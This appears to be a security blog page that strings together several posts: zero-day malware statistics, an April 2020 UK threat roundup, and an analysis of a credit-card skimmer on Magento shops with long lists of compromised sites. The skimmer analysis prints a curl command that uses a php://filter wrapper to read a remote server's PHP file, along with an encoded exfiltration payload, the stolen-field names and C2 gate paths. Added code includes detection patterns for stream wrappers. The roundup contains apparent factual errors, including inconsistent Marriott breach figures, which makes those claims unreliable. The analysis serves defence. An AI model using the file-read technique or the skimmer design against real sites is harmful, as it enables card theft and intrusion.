In this context, we shall define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of an arbitrary malware family. The following image (Fig. 1) shows how most of the analyzed malware is unknown to the InfoSec community and to common antivirus vendors. This finding supports the picture of an ever-evolving malware panorama, where attackers start from a shared code base but modify it depending on their need to stay stealthy.

The reported data are collected during the first propagation of the malicious files across organizations. This means companies are highly exposed to the risk of Zero-Day malware. Detection and response time play a central role in such cases, where the attack stays stealthy for hours or even days.
Along with the Zero-Day malware observation, most of the malware known at time of delivery does not have high chances of being blocked by security controls. 8% of the malware is detected by a few AV engines and only 33% is actually well identified at time of attack. Even so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of the analyzed samples that are not Zero-Day are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by fewer than 5 antivirus engines at detection time, we can appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads the way with 54% of cases, slightly decreasing since 2018. One more interesting trend in the analyzed data is the surprising decrease of ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the bullish rise of “Trojan” behaviours, up to 35% of cases, more than double the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the “The Rise of Targeted Ransomware” section.

A reasonable interpretation of the notable changes in these data could actually agree with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, much of the delivered malware is actually a single part of a more complex infection chain: a chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to the InfoSec community at the time of delivery substantially shifted their distribution from previous years. In particular, ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.

If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Cyber Security Roundup for April 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, March 2020.

The UK went into lockdown in March due to the coronavirus pandemic; these are unprecedented and uncertain times. Unfortunately, cybercriminals are taking full advantage of the situation: both UK citizens and businesses have been hit with a wave of COVID-19 themed phishing emails and scam social media and text messages (smishing), which prompted warnings by the UK National Cyber Security Centre and UK banks, and a crackdown by the UK Government.
Convincing COVID-19 Scam Text Message (Smishing)

I have not had the opportunity to analyse a copy of the above scam text message (smishing), but it looks like the web link displayed is not what it appears to be. My guess is that the link is not part of the gov.uk domain, and that the attacker has used an internationalized domain name (IDN) homograph attack, namely using foreign-alphabet characters to disguise the true address of the linked malicious website.
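One way to test that suspicion, as an added example (not code from the post): given the hostname actually displayed and the one the message claims to be, flag any non-ASCII label, show its punycode form, and detect labels that mix scripts, such as a Cyrillic “о” sitting between Latin letters. The hostnames below are constructed, and the script-mixing rule is a heuristic based on Unicode character names rather than a full confusables check.

```python
"""Heuristic IDN homograph check for a displayed hostname.  Added example,
not from the post: the hostnames are constructed and the mixed-script rule
is a heuristic (it is not the full Unicode confusables algorithm)."""
import unicodedata

# Script names as they appear at the start of Unicode character names.
SCRIPTS = ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN", "HEBREW", "ARABIC",
           "DEVANAGARI", "THAI", "HANGUL", "HIRAGANA", "KATAKANA", "CJK")


def script_of(ch):
    """Script of a character taken from its Unicode name; digits, hyphens and
    other symbols count as COMMON so they never trigger a mixed-script flag."""
    name = unicodedata.name(ch, "")
    for script in SCRIPTS:
        if name.startswith(script):
            return script
    return "COMMON"


def analyse_label(label):
    """Per-label findings: punycode form, whether it is an IDN, script mixing."""
    scripts = {script_of(ch) for ch in label} - {"COMMON"}
    try:
        ascii_form = label.encode("idna").decode("ascii")  # xn--... for non-ASCII
    except UnicodeError:
        ascii_form = None  # the IDNA codec refused the label; treat as suspicious
    return {
        "label": label,
        "ascii": ascii_form,
        "is_idn": not label.isascii(),
        "mixed_script": len(scripts) > 1,
        "scripts": sorted(scripts),
    }


def homograph_check(displayed_host, expected_host):
    """Explain why `displayed_host` should not be trusted as `expected_host`.
    Returns a dict with a `suspicious` flag, the reasons and per-label details."""
    displayed = unicodedata.normalize("NFKC", displayed_host.strip().lower())
    expected = expected_host.strip().lower()
    labels = [analyse_label(lab) for lab in displayed.split(".")]
    if displayed == expected:
        return {"suspicious": False, "reasons": [], "labels": labels}
    reasons = []
    if any(lab["is_idn"] for lab in labels):
        reasons.append("non-ASCII label(s); the punycode form differs from the expected host")
    if any(lab["mixed_script"] for lab in labels):
        reasons.append("a label mixes scripts (e.g. Latin and Cyrillic)")
    if any(lab["ascii"] is None for lab in labels):
        reasons.append("a label cannot be IDNA-encoded")
    if not reasons:
        reasons.append("hostname differs from the expected host")
    return {"suspicious": True, "reasons": reasons, "labels": labels}


if __name__ == "__main__":
    # Constructed lookalike: Cyrillic 'о' (U+043E) in place of Latin 'o'.
    for host in ("gov.uk", "g\u043ev.uk", "m\u00fcnchen.de"):
        print(host, homograph_check(host, "gov.uk"))
```

The punycode form is what the browser actually resolves, so showing it next to the displayed text is usually enough to make the substitution visible to a user; the mixed-script rule catches the common lookalike case without flagging legitimate single-script IDNs.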

I was privileged to be on The Telegraph Coronavirus Podcast on 31st March, where I was asked about the security of video messaging apps; a transcript of what I advised is here. Further coronavirus cybersecurity advice was posted on my blog, on working from home securely and to raise awareness of coronavirus-themed message scams. It was also great to see the UK payment card contactless limit increased from £30 to £45 to help prevent the spread of coronavirus.

March threat intelligence reports shone a light on the scale of the cybercriminal shift towards exploiting the COVID-19 crisis for financial gain. Check Point's Global Threat Index reported a spike in the registration of coronavirus-themed domain names, stating that more than 50% of these new domains are likely to be malicious in nature. Proofpoint reports that more than 80% of the threat landscape is using coronavirus themes in some way. There has been a series of hacking attempts directly against the World Health Organisation (WHO), from DNS hijacking to spread a malicious COVID-19 app to a rather weird plot to spread malware through a dodgy anti-virus solution.

Away from the deluge of coronavirus cybersecurity news and threats, Virgin Media was found to have left a database open, which held thousands of customer records exposed, and T-Mobile's email vendor was hacked, resulting in the breach of their customers' and employees' personal data.

International hotel chain Marriott reported that 5.2 million guest details were stolen after an unnamed app used by guests was hacked. According to Marriott's online breach notification, stolen data included guest name, address, email address, phone number, loyalty account number and point balances, employer, gender, birthdays (day and month only), airline loyalty program information, and hotel preferences. It was only on 30th November 2018 that Marriott disclosed a breach of 383 million guests. Tony Pepper, CEO at Egress, said: “Marriott International admitted that it has suffered another data breach, affecting up to 5.2 million people. This follows the well-documented data breach highlighted in November 2018 where the records of approximately 339 million guests were exposed in a catastrophic cybersecurity incident. Having already received an intention to fine from the ICO to the tune of £99m for that, Marriott will be more than aware of its responsibility to ensure that the information it shares and stores is appropriately protected. Not only does this news raise further concerns for Marriott, but it also serves as a reminder to all organisations that they must constantly be working to enhance their data security systems and protocols to avoid similar breaches. It will be interesting to see if further action is taken by the ICO.”

Five billion records were found to be exposed by UK security company Elasticsearch. Researchers also found an open MongoDB database on Amazon Web Services holding eight million European Union citizen retail sales records, which included personal and financial information. And Let's Encrypt revoked over 3 million TLS certificates due to a bug in its certificate rechecking.

March was another busy month for security updates: Patch Tuesday saw Microsoft release fixes for 116 vulnerabilities, and there was an out-of-band Microsoft fix for the 'EternalDarkness' bug on 10th March, but a zero-day exploited vulnerability in Windows remained unpatched by the Seattle-based software giant. Adobe released a raft of security patches, as did Apple (over 30 patches), Google, Cisco, DrayTek, VMware, and Drupal.

Stay safe, stay home and watch out for the scams.

Uncovering New Magecart Implant Attacking eCommerce

If you are a credit card holder, this post could be of interest to you. Defending our financial assets is always one of the top priorities in the cybersecurity community but, on the other side of the coin, it is one of the most romantic attacks performed by cyber-criminals in order to steal money. Today I'd like to share the analysis of a skimmer implant spotted in the wild. So far I am not a hundred percent sure that the discovered implant is an evolution of Magecart, since the activation scripts are quite different even if they do use the Magento core infrastructure. To my current understanding we might be facing a new Magecart version or a new framework altogether; notes and suggestions are always welcome.

Disclaimer

National law enforcement units have been alerted; this post is published a few hours after they gave me the authorization to do so. If you used your credit card on one of the following eCommerce sites (IoC section), consider your credit card no longer private: call your bank and follow the deactivation steps. Since the C2 and relays are still up and running, the addresses have been obfuscated to avoid replication. I want to thank Daniele B. for giving me the first “wired eCommerce”.

Analysis

Everything starts from a vulnerable eCommerce website. The user does not notice anything weird, since she normally adds items to her cart, surfing from page to page, viewing and selecting items and finally deciding to check out, either by registering a new account or by proceeding as a guest user. However, the attacker can abuse the eCommerce vulnerabilities to introduce a nasty piece of JavaScript that sends information (for example: name, address, email, credit card number, CVV, expiration date, and so on) to another host belonging to the cyber criminal. The following picture shows the point.

Fig1: External Connection outside the eCommerce Perimeter

From Fig1 we see an unexpected outbound connection (HTTP POST) to an external source: https://*****.]com/js/ar/ar2497.]php. This POST carries a quite interesting payload, partially shown (to avoid leaking information) in the next code section.

touch=86f63747d33786f607e237f62656c6164786f6d656e236f6d662e657d6265627d3431343431333831333737383930303136256870713d3236256870723d32303235362366767d3736353626696273747e616d656d3a4f686e6164716e662c6163747e616d656d3259667965627166216464627563737d35452230366f657e6471696e652230377169752233452230313236236964797d364275637e6f6623747164756d3132362a79607d393336353036236f657e6472797d35535620786f6e656d3535393d2233373d283836256d61696c6d3a686f6e6164716e6524303279636b696e236f6d66257167656e647 .....

The encrypted/encoded data lands on an external gate hosted on *****.]com. This is a slightly different behavior compared to the original Magecart, which used to send data directly in base64 format. Mykada looks like a legitimate eCommerce website that was compromised and used as a relay (one more difference from Magecart). Further investigation of this relay shows a Magento core installation (a common indicator of Magecart) which includes js/index.php (ref: https://github.com/integer-net/GermanStoreConfig/blob/master/src/js/index.php), a nice tool for dynamically building a composite JavaScript file for performance boosting and better compression. By using this public Magento core functionality and by guessing file paths (looking for known public folders on the host helps in guessing paths) we can obtain the original malicious back-end file injected by the attacker.

curl http:]//*****.]com/js/index.php\?f\=php://filter/convert.base64-encode/resource\=/home/****/public_html/js/ar/ar906.php
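Both request shapes seen so far, the checkout-page POST to a .php script under js/ and the php://filter stream wrapper in the js/index.php query string, are easy to hunt for in the shop's own web-server access logs, which is the check a site owner on the IoC list would want to run first. The following is an added example (not code from the post or from Magento): it parses combined-format access log lines and flags both patterns. The log lines, client addresses and the shop.example hostname are constructed for the example; the static-asset directories (js/, skin/, media/) are the Magento 1 layout.

```python
"""Flags two request patterns from the analysis above in web-server access
logs: PHP stream wrappers (php://filter and friends) in a query string, and
HTTP POSTs to a .php script under a Magento static-asset directory, where no
checkout data should ever be posted.  Added example, not from the post; the
log lines, addresses and hostname are constructed."""
import re
from urllib.parse import unquote, urlsplit

# Apache/Nginx "combined" log format as written by a default virtual host.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP stream wrappers that have no business in a Magento asset request.
WRAPPERS = ("php://", "phar://", "data://", "expect://", "file://")
# Magento 1 directories that hold static assets, never form handlers.
STATIC_DIRS = ("/js/", "/skin/", "/media/")

# Constructed log: wrapper read of the back-end file, a checkout POST to the
# exfiltration gate, two benign requests, and a percent-encoded wrapper.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2020:10:12:01 +0000] "GET /js/index.php?f=php://filter/convert.base64-encode/resource=/home/shop/public_html/js/ar/ar906.php HTTP/1.1" 200 8123 "-" "curl/7.64.0"
203.0.113.9 - - [10/Mar/2020:10:13:44 +0000] "POST /js/ar/ar2497.php HTTP/1.1" 200 17 "https://shop.example/checkout/onepage/" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2020:10:14:02 +0000] "GET /js/index.php?f=prototype/prototype.js,varien/js.js HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
198.51.100.8 - - [10/Mar/2020:10:15:30 +0000] "POST /checkout/onepage/saveOrder/ HTTP/1.1" 200 512 "https://shop.example/checkout/onepage/" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2020:10:16:12 +0000] "GET /js/index.php?f=%70hp%3A%2F%2Ffilter/resource=index.php HTTP/1.1" 200 3310 "-" "python-requests/2.23"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings_for(entry):
    """Return the list of rule names a parsed entry triggers (empty if benign)."""
    hits = []
    parts = urlsplit(entry["target"])
    path = parts.path.lower()
    query = unquote(parts.query).lower()  # decode %XX so php%3A%2F%2F is caught too
    if any(w in query for w in WRAPPERS):
        hits.append("stream-wrapper-in-query")
    if (entry["method"] == "POST" and path.endswith(".php")
            and path.startswith(STATIC_DIRS)):
        hits.append("post-to-static-dir-script")
    return hits


def scan_log(text):
    """Return (ip, method, target, rules) for every line that triggers a rule."""
    alerts = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format; a real pipeline would count these
        rules = findings_for(entry)
        if rules:
            alerts.append((entry["ip"], entry["method"], entry["target"], rules))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(*alert)
```

The second rule only sees POSTs that reach the shop itself; when the gate lives on a separate relay, as in this case, the same evidence is on the relay's logs, and on the victim shop it is the browser that can be constrained: a Content-Security-Policy with a restrictive connect-src and form-action on checkout pages stops injected script from posting form data to hosts outside the allow list.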

The base64-decoded result is the obfuscated PHP file described below.

We are now facing the initial stage of obfuscated .php code. The following image (Fig2) shows how the attacker obfuscated the first stage. Note the activation variable “touch”, which triggers the process in both flavors: GET and POST. Once the activation variable is found, a compressed and encoded payload is assembled through a chain of variable concatenations and later executed (eval).

Fig2: Payload Stage 1

By following the obfuscation chain in reverse order we end up with the following code (Fig3). This time the attacker used more obfuscation techniques, from charset differentiation and junk code to random comments sprinkled throughout, making the overall reading quite hard. But by taking my time, ordering every single line, substituting variables and re-encoding with my favourite charset, I was able to extract the decoding loop and quickly understand the payload's behaviour.

Fig3: Payload Stage 3

Indeed, once the script decodes the payload received from the compromised eCommerce (by rotating over charsets with hard-coded strings; Fig3 decodes the touch variable content), every stolen field is arranged into a crafted object and sent to one more external host: https:]//^^^^^.]su/gate/proxy. The following code section helps us understand the execution chain.

REMOTE_ADDR
Content-Type: text/html; charset=utf-8
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
%&=
Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0
touch
host
number
exp1
exp2
cvv
firstname
lastname
address
city
state
zip
country
phone
email
HTTP_USER_AGENT
Number
Domain
CVV
Date
/
billing:firstname
billing:lastname
Holder
billing:email
billing:street1
billing:postcode
billing:region_id
billing:city
billing:country_id
billing:telephone
hash=&ua=&ip=
https:]//^^^^^^^.]su/gate/proxy
var js_ar=
;

We have one more host that needs to be analyzed. Taking a closer look at the domain used, we can agree that it looks like the final proxy gate, which stores data in a given database (MongoDB). Again, by enumerating and searching its public information it was actually possible to spot and enumerate the technology used to store the new malicious implant (docker compose to build up the infrastructure). By spotting a temporary directory, used to store temporary files between the components of the attacker's infrastructure, I was able to build a simple monitoring script which revealed the most used compromised eCommerce sites.

Attack Magnitude

From the command and control host we can observe what is actually passing through it, but we have no idea about the overall magnitude of the infection chain, since many eCommerce sites could have a low selling rate (rate of customers during my monitoring phase). In that case, even if they are compromised, it is very hard to discover every compromised eCommerce site using this technique: looking at, converting and importing the temporary files generated every time a data leak happens (every time a user enters her credit card). So we need another method. Fortunately the host has a PTR (Pointer Record) to mo-------.]fvds].ru, as shown in Fig4.

Fig4: PTR on ^^^^^^.su

The new host (mo-------) definitely recalls, in a unique way, the email address (mo------@protonmail.]com) used to register mag^^^^^^.]su. By the way, it has been active since 2019-07!

Fig5: registered eMail Address

According to urlscan.io, using the PTR record to understand how many known websites have links pointing to mo-----.]fvds.]ru, you find something quite worrying (as shown in Fig6): more than 1400 potentially infected eCommerce sites. Now, I am not saying that every single eCommerce site in the list has been compromised, but taking 3 of them at random (reported in the IoC section) I found the exact same infection chain on each one. So potentially every eCommerce site on that list (i.e. pointing to the command and control) should be checked.

Fig6: Link on m——–fvds.]ru

According to urlscan.io, most of the websites pointing to momo--------s.]ru follow the geographic distribution in Fig7. Most of them are US based, followed by RU, NL and IN. While it is hard to say that this is a targeted attack against US eCommerce websites, the stats (Fig7) are surprisingly talkative.

Fig7: Location of Possible Compromised eCommerce

IoC

The following IoC have been extracted from the command and control as described in the Analysis section. I have evidence that those eCommerce sites send credit card numbers to magesource, but I did not analyse every single eCommerce site outside the “High Confidence” list, which could be compromised using different infection chains. More potentially compromised eCommerce sites could be found; a nice unverified list (“Low Confidence”) follows.

High Confidence Compromised:

– (POST): https://*****/js/ar/ar2497.php
– Sha256 (ar2497.php): 7a04ef8eba6e72e3e21ba9da5e1ac99e4f9022fae19dc9c794d87e4aadba1db4
– mom*****@protonmail.]com (email used to register c2)
– ——.]com (relay)
– https://^^^^^^^^^.]su/gate/proxy (c2)
– mom*****.]fvds].ru (PTR)
– http://www.]startinglineproducts.]com
– shop.sobelathome.]com
– shop.princessluxurybed.]com
– http://www.nclhome.]com
– http://www.shoprednose.]com.]au
– http://www.plusmedical.]com.]au
– http://www.selariadias.]com.]br
– owners.clubwyndhamstore.]com
– http://www.assokappa.]it
– http://www.shogunlivraria.]com.]br
– http://www.broadtickets.]com
– http://www.broadticket.]com
– http://www.siamflorist.]com
– http://www.castmemberlinen.]com
– bumperworksonline.]com
– http://www.stixx.]com.]br
– http://www.worldmarkbywyndhamstore.]com
– tknwthunderdome.]com
– http://www.silknaturals.]com

Low Confidence Compromised (more investigation is needed):
URL: https://mo——.]fvds.]ru/
URL: http://hotelcathedrale.]be/
URL: https://mag^^^^^^^^.]su/
URL: http://www.]americanlighter.]com/
URL: http://www.]turyagatea.]com/
URL: http://www.]dysin.]com/
URL: https://magesource.]su/
URL: http://demolicaomoveis.]com.]br/
URL: http://www.]zamarimarcondes.]com.]br/
URL: https://www.]chirobuddy.]net/
URL: http://flagandsymbol.]com/
URL: http://english-furniture.]co.]uk/
URL: https://shop.]horoskoper.]net/
URL: https://myphonetics.]com/
URL: https://magesource.]su/saturn/login
URL: http://www.]almosauto.]in/
URL: http://chappalwalla.]com/
URL: http://store.]uggtasman.]com.]au/
URL: http://www.]vintageindiarishikesh.]com/
URL: http://www.]matexbuyer.]com/
URL: http://www.]doreall.]com/
URL: https://prawnman.]com.]au/
URL: http://www.]autocleaningbrunssum.]nl/
URL: https://www.]paudicesrl.]it/
URL: http://www.]pejenterprisesinc.]com/
URL: http://luxuryjewelleryto.]com/
URL: http://okj.]in/
URL: http://aquasport.]sigmacell.]in/
URL: https://www.]xinginroo.]com/
URL: http://dhyanaa.]com/
URL: https://www.]arenaflorist.]com/
URL: http://www.]officecorrect.]com/36-6.]html
URL: https://medik8.]bg/
URL: https://www.]denimvenim.]com/
URL: https://www.]theaugustco.]com/
URL: http://www.]sportlowcost.]it/
URL: https://www.]sunrisewholesaleinc.]com/
URL: http://www.]fashionaxe.]com/
URL: https://gorusticx.]com/
URL: http://www.]tribalasia.]com.]my/
URL: https://magesource.]su/mage.]js
URL: http://yugen-studio.]com/
URL: https://www.]prostraps.]com/
URL: http://fetchscripts.]com/
URL: http://de-lices.]ru/
URL: https://kolcraft-staging.]gianthatworks.]com/
URL: http://oomph.]com.]sg/
URL: http://pharmatrades.]com/
URL: http://www.]onirico.]it/
URL: https://commercialpoolandspasupplies.]com/
URL: http://montecitocaviar.]com/
URL: http://fashionbagsshoes.]com/
URL: http://www.]nuestranuevaweb.]com/
URL: http://prolineglobal.]com/
URL: http://trueitglobal.]com/
URL: http://www.]opticaloutlet.]ca/
URL: https://dload.]com.]br/
URL: http://fashionfromla.]com/
URL: http://www.]kalevalaproducts.]com/
URL: http://www.]northhillco.]com/
URL: http://www.]thevintagegrapes.]com/
URL: https://www.]khadiindia.]in/
URL: http://only16.]net/
URL: http://rpkorea.]com/
URL: http://www.]eurocucina.]eu/
URL: http://richbumlife.]com/
URL: http://www.]hotsca.]com/
URL: http://schrikdraad.]nu/
URL: http://www.]i91cloud.]com/
URL: https://krausjeans.]com/
URL: https://poolstore.]com.]au/
URL: http://www.]happieproducts.]com/
URL: http://www.]airckmoaw.]com/
URL: http://www.]gpmbv.]com/
URL: http://jacksvapes.]com/
URL: https://www.]1by1shop.]com/
URL: https://liquidlightglows.]com/bar-supplies-drink-ware/9-oz-light-up-led-disco-ball-rock-glass.]html
URL: http://www.]esde.]ro/
URL: http://www.]colesinfrastructure.]com/
URL: http://shop.]laboutiqueachapeaux.]com/
URL: http://www.]shopnsmiles.]com/
URL: http://www.]laboutiqueachapeaux.]com/
URL: http://www.]oomph.]com.]sg/
URL: http://chevyc10parts.]com/
URL: https://www.]sellsspares.]com/
URL: https://www.]tec-heads.]com/
URL: http://mstech.]com.]au/
URL: https://falcontraders.]co.]uk/
URL: https://magesource.]su/tmp/superpost.]txt
URL: https://magesource.]su/domain/magesource
URL: http://magesource.]su/app/lib/
URL: http://magesource.]su/tmp/caesar/
URL: http://magesource.]su/tmp/
URL: http://magesource.]su/app/callbacks/
URL: http://magesource.]su/app/routes/
URL: http://magesource.]su/app/models/
URL: http://magesource.]su/app/controllers/
URL: http://magesource.]su/app/
URL: http://homeautomation.]ph/
URL: https://www.]gardenarteu.]com/
URL: http://momega.]vn/
URL: http://grupocyber.]net/
URL: https://www.]wisesolutions.]net/
URL: https://saritahanda.]com/
URL: http://www.]cancerexit.]com/
URL: http://store.]shedbuster.]com/
URL: https://www.]turismo.]pt/
URL: http://aussiebloke.]com.]au/
URL: http://ferlamsrl.]com/
URL: http://www.]dwanka.]com/
URL: http://philippelebac.]fr/
URL: https://www.]peteshomekitchen.]com/
URL: https://brooksleather.]com/
URL: http://www.]airsoftlegend.]com/
URL: http://luggagemama.]com/
URL: http://www.]wondershop.]in/
      URL: http://luxuryjewelleryto.]com/
      URL: http://uglynbeauty.]com/
      URL: https://davillblinds.]com/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]arquegym.]com.]br/
      URL: https://www.]athleticmmagear.]com/
      URL: https://www.]eyewear69.]my/
      URL: http://fashionfromla.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://www.]reynsaon.]com/
      URL: http://www.]nurserydecalsandmore.]com/
      URL: http://www.]memorywholesalers.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://www.]plumbedright.]com/
      URL: https://www.]thepartshome.]se/
      URL: http://hotelcathedrale.]be/
      URL: http://devdantona.]com/
      URL: http://www.]matexbuyer.]com/
      URL: https://poolstore.]com.]au/
      URL: http://www.]ludoville.]it/
      URL: http://supersonicdeal.]com/
      URL: https://www.]taptye.]com/
      URL: http://www.]krirob.]nu/
      URL: http://www.]markitaly.]it/
      URL: http://www.]almosauto.]in/
      URL: http://www.]danatsouq.]com/
      URL: https://presse-web.]com/
      URL: http://www.]mentalgamesonline.]com/
      URL: http://lobbyclean.]com/
      URL: http://selectce.]co.]uk/
      URL: http://batubati.]hu/
      URL: http://deezcard.]fr/
      URL: http://www.]regalando.]eu/
      URL: http://kiiroousa.]com/
      URL: http://toppaint.]co.]th/
      URL: http://www.]schoenes-aus-nicki.]de/
      URL: http://www.]masaken.]com.]tr/
      URL: http://www.]virmans.]com/
      URL: http://schornsteinboerse.]com/
      URL: http://personalitytailors.]com/
      URL: https://www.]websun.]us/
      URL: http://www.]shopnsmiles.]com/
      URL: http://climatecsa.]com/
      URL: https://gyvunuparduotuve.]lt/
      URL: http://www.]colesinfrastructure.]com/
      URL: http://ecoselectnational.]co.]za/
      URL: https://falcontraders.]co.]uk/
      URL: http://www.]codiliam.]fr/
      URL: https://telefonedelongoalcance.]com.]br/
      URL: http://www.]tresorsdesoceans.]fr/home
      URL: http://lazieneczka.]pl/
      URL: http://net-istore.]ro/
      URL: http://www.]almosauto.]in/
      URL: http://www.]hotsca.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://labdooshoes.]com/
      URL: http://www.]airckmoaw.]com/
      URL: http://luxuryjewelleryto.]com/
      URL: http://www.]i91cloud.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://prawnman.]com.]au/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]arenaflorist.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]mynumberplates.]com/
      URL: http://www.]myvanaccessories.]co.]uk/
      URL: https://www.]ezy-care.]co.]uk/
      URL: http://www.]mywiperblades.]co.]uk/
      URL: http://www.]britoil.]co.]uk/
      URL: https://www.]xinginroo.]com/
      URL: http://www.]myengineoil.]co.]uk/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: http://demolicaomoveis.]com.]br/
      URL: http://www.]turyagatea.]com/
      URL: https://www.]d108.]ru/
      URL: https://www.]1by1shop.]com/
      URL: http://www.]almosauto.]in/
      URL: http://hotelcathedrale.]be/
      URL: https://krausjeans.]com/
      URL: https://krausjeans.]com/
      URL: https://magesource.]su/
      URL: http://motornets.]com/
      URL: https://www.]eyewear69.]my/
      URL: https://krausjeans.]com/
      URL: https://krausjeans.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]zamarimarcondes.]com.]br/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]ruotalibera.]biz/
      URL: http://hotelcathedrale.]be/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]khadiindia.]in/
      URL: http://alch.]it/
      URL: http://english-furniture.]co.]uk/
      URL: http://dhyanaa.]com/
      URL: http://hotelcathedrale.]be/
      URL: http://www.]oomph.]com.]sg/
      URL: http://www.]webshopsmagento.]nl/
      URL: https://magesource.]su/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://www.]sellsspares.]com/
      URL: https://magesource.]su/mage.%5Djs
      URL: https://momo33333.]fvds.]ru/
      URL: http://unsquashaball.]com/
      URL: http://www.]togotelecom.]ca/
      URL: https://www.]niwuma.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://www.]athleticmmagear.]com/
      URL: http://wraps.]ru/
      URL: http://hotelcathedrale.]be/
      URL: http://fashionfromla.]com/
      URL: http://hotelcathedrale.]be/
      URL: https://prawnman.]com.]au/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: http://www.]togotelecom.]ca/
      URL: http://unsquashaball.]com/
      URL: https://magesource.]su/
      URL: http://hotelcathedrale.]be/
      URL: http://zuzugadgets.]com/
      URL: http://www.]xxlgrip.]com/
      URL: https://www.]xinginroo.]com/
      URL: http://worldstogether.]com/
      URL: http://www.]webshopsmagento.]nl/
      URL: http://vkconline.]com/
      URL: http://www.]vintageindiarishikesh.]com/
      URL: http://vanquish.]co.]in/
      URL: http://usacontainergroup.]com/
      URL: http://ukrkniga.]com/
      URL: http://trueitglobal.]com/
      URL: http://www.]tourguidescalabria.]com/
      URL: http://tile.]tilesandiego.]com/
      URL: https://www.]theaugustco.]com/
      URL: https://www.]techno-torch.]com/
      URL: https://www.]taptye.]com/
      URL: http://www.]supritam.]com/
      URL: https://www.]sunrisewholesaleinc.]com/
      URL: https://www.]straightfromfarmers.]com.]au/
      URL: http://store.]uggtasman.]com.]au/
      URL: http://stonemanasia.]com/
      URL: http://www.]sportlowcost.]it/
      URL: http://smallpenfactory.]com.]au/
      URL: http://shophorkeyswoodandparts.]com/
      URL: http://shop.]taketime.]ch/
      URL: http://shop-camera.]com/
      URL: http://www.]shieldmans.]com/
      URL: http://seasonallivingokc.]com/
      URL: http://www.]schoenes-aus-nicki.]de/
      URL: http://sandoggrus.]dk/
      URL: http://www.]ruotalibera.]biz/
      URL: http://richbumlife.]com/
      URL: http://redcellmedical.]com/
      URL: http://purplebluepublishing.]com/
      URL: http://prolineglobal.]com/
      URL: http://www.]pibeauty.]com/~pibeauty/
      URL: http://petanyway.]net/
      URL: http://www.]opticalsupplies.]com/
      URL: http://only16.]net/
      URL: http://www.]officiel.]it/
      URL: http://nowknow.]ch/
      URL: http://www.]nixim3dpuzzle.]com/
      URL: http://www.]nationaltiledistribution.]com/
      URL: https://myphonetics.]com/
      URL: https://my.]nutis.]com/
      URL: http://mstech.]com.]au/
      URL: http://montecitocaviar.]com/
      URL: http://megamojster.]si/
      URL: http://www.]mage-apps.]de/
      URL: http://www.]ludoville.]it/
      URL: http://www.]loosen-up.]com/
      URL: http://www.]laboutiqueachapeaux.]com/
      URL: http://kupu.]es/
      URL: https://kolcraft-staging.]gianthatworks.]com/
      URL: https://www.]kitauto.]pt/
      URL: http://www.]katetsui.]com/
      URL: http://jewelsofdesert.]com/
      URL: http://www.]isbbookstore.]com/
      URL: http://infcollection.]com/
      URL: https://ibercorte.]com/
      URL: https://hyperstrength.]com/
      URL: http://www.]haitralled.]com/
      URL: http://grupocyber.]net/
      URL: https://gorusticx.]com/
      URL: http://goldwithyou.]com/
      URL: http://girlsandpearls.]com/
      URL: http://gemastrology.]com/
      URL: https://www.]gardenarteu.]com/
      URL: http://www.]fyringe.]com/
      URL: http://fetchscripts.]com/
      URL: http://fashionbagsshoes.]com/
      URL: http://www.]farmcraft.]at/
      URL: http://falcontraders.]co.]uk/
      URL: http://www.]esde.]ro/
      URL: http://www.]enotecaosteriaroma.]it/
      URL: http://www.]dysin.]com/
      URL: https://dourosoptika.]gr/
      URL: http://doctor-alcrimea.]ru/
      URL: http://diamondwrapfactory.]com/
      URL: http://devdantona.]com/
      URL: https://democanopy.]com/
      URL: http://dealelement.]com/
      URL: https://davillblinds.]com/
      URL: http://cyprusitstore.]com/
      URL: http://creekfire.]com/
